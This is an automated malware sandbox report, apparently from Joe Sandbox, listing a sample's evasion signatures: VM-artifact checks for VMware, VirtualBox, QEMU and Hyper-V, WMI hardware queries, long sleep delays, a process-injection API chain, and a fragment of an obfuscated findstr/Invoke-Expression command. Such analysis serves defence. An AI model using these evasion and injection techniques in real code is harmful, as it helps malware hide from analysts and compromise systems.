Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 38_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6365
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 527
Source: C:\Windows\System32\cmd.exe Window / User API: threadDelayed 419
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 417
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6569
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3067
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3567
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2428
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 423
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 645
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 582
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 554
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 523
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 511
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 497
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 439
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 492
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 461
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 459
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 472
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 461
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 454
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 457
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 447
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 449
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 444
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 445
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\cmd.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\cmd.exe API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe API coverage: 9.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2324 Thread sleep count: 6365 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152 Thread sleep count: 3527 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088 Thread sleep count: 6194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1924 Thread sleep count: 527 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 936 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 7480 Thread sleep time: -41900s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780 Thread sleep count: 3567 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780 Thread sleep count: 2428 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 1424 Thread sleep count: 423 > 30
Source: C:\Windows\System32\dllhost.exe TID: 1424 Thread sleep time: -42300s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 2616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 3604 Thread sleep count: 645 > 30
Source: C:\Windows\System32\winlogon.exe TID: 3604 Thread sleep time: -64500s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5504 Thread sleep count: 582 > 30
Source: C:\Windows\System32\lsass.exe TID: 5504 Thread sleep time: -58200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6332 Thread sleep count: 554 > 30
Source: C:\Windows\System32\svchost.exe TID: 6332 Thread sleep time: -55400s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7152 Thread sleep count: 276 > 30
Source: C:\Windows\System32\svchost.exe TID: 7024 Thread sleep count: 192 > 30
Source: C:\Windows\System32\svchost.exe TID: 6260 Thread sleep count: 523 > 30
Source: C:\Windows\System32\svchost.exe TID: 6260 Thread sleep time: -52300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4328 Thread sleep count: 511 > 30
Source: C:\Windows\System32\svchost.exe TID: 4328 Thread sleep time: -51100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 368 Thread sleep count: 497 > 30
Source: C:\Windows\System32\svchost.exe TID: 368 Thread sleep time: -49700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5244 Thread sleep count: 439 > 30
Source: C:\Windows\System32\svchost.exe TID: 5244 Thread sleep time: -43900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2584 Thread sleep count: 492 > 30
Source: C:\Windows\System32\svchost.exe TID: 2584 Thread sleep time: -49200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4388 Thread sleep count: 461 > 30
Source: C:\Windows\System32\svchost.exe TID: 4388 Thread sleep time: -46100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1032 Thread sleep count: 459 > 30
Source: C:\Windows\System32\svchost.exe TID: 1032 Thread sleep time: -45900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3916 Thread sleep count: 472 > 30
Source: C:\Windows\System32\svchost.exe TID: 3916 Thread sleep time: -47200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1396 Thread sleep count: 461 > 30
Source: C:\Windows\System32\svchost.exe TID: 1396 Thread sleep time: -46100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 768 Thread sleep count: 454 > 30
Source: C:\Windows\System32\svchost.exe TID: 768 Thread sleep time: -45400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5332 Thread sleep count: 457 > 30
Source: C:\Windows\System32\svchost.exe TID: 5332 Thread sleep time: -45700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6708 Thread sleep count: 447 > 30
Source: C:\Windows\System32\svchost.exe TID: 6708 Thread sleep time: -44700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4396 Thread sleep count: 449 > 30
Source: C:\Windows\System32\svchost.exe TID: 4396 Thread sleep time: -44900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5320 Thread sleep count: 444 > 30
Source: C:\Windows\System32\svchost.exe TID: 5320 Thread sleep time: -44400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3492 Thread sleep count: 445 > 30
Source: C:\Windows\System32\svchost.exe TID: 3492 Thread sleep time: -44500s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40D894 FindFirstFileExW, 17_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 17_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43D894 FindFirstFileExW, 17_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 17_2_00000253FC43DA18
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36D894 FindFirstFileExW, 18_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_000002A5AF36DA18
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 37_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2D894 FindFirstFileExW, 37_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBD894 FindFirstFileExW, 38_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EED894 FindFirstFileExW, 38_2_0000020175EED894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165ED894 FindFirstFileExW, 39_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661D894 FindFirstFileExW, 39_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_000002D01661DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: svchost.exe, 00000031.00000000.2819574872.0000022E66A2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3415075913.0000022E66A2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemuwmi2
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.dr Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: System.evtx.49.dr Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.11.dr Binary or memory string: vmci.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: Amcache.hve.11.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.dr Binary or memory string: VMware
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxguest.sys
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual USB Mouse
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: QEMU HARDDISK
Source: Amcache.hve.11.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxMouse.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.11.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.dr Binary or memory string: VMware Virtual disk 2.0 6000c29c2bea38880a8a16ee9f37bec9PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr Binary or memory string: \driver\vmci,\driver\pci
Source: cmd.exe, 00000011.00000003.2404007494.00000253FC17D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414667829.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414573614.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414801651.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2404051341.00000253FC178000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414965006.00000253FC177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAbHorsAGfLWFjJNrKHvWocR=e-Expression 'adnRtmnvxKrKceiWEAAFQW=ion '$TIMGz=qVaeeTRxshUrjZxfqxJBFkNYzLaL=lckmblckpblckrAfNoxIvdXhTBbvJNzCkKYxLKaXkycRIThPnjF=kmblck($Vcvep,AGZcOpprjzwDmCNlvINgjjZlHsYSLqNSSCis=lckSblckyblcksAhnCzrQTYKNgoLUmdjzOYMYqKajhkheLybvqwPqKmnHEAeKjNfwbgEgNiWSyiIJQFcHnpDPnTPBLfuQGqZ
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: !Hyper-V PowerShell Direct Service
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: Amcache.hve.11.dr Binary or memory string: VMware
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $p43da5e64-eb7b-4fa8-a45c-cf68357b99d6C:\Program Files (x86)\Joebox\unpack\wmievasions.ps1lp.
Source: dwm.exe, 0000002A.00000000.2781110332.000001D156AA0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: svchost.exe, 00000031.00000000.2819741090.0000022E66A43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmci
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmusrvc2
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: VMware SATA CD00
Source: Amcache.hve.11.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 0000002F.00000002.3453193611.00000200A2218000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: NECVMWarVMware SATA CD00
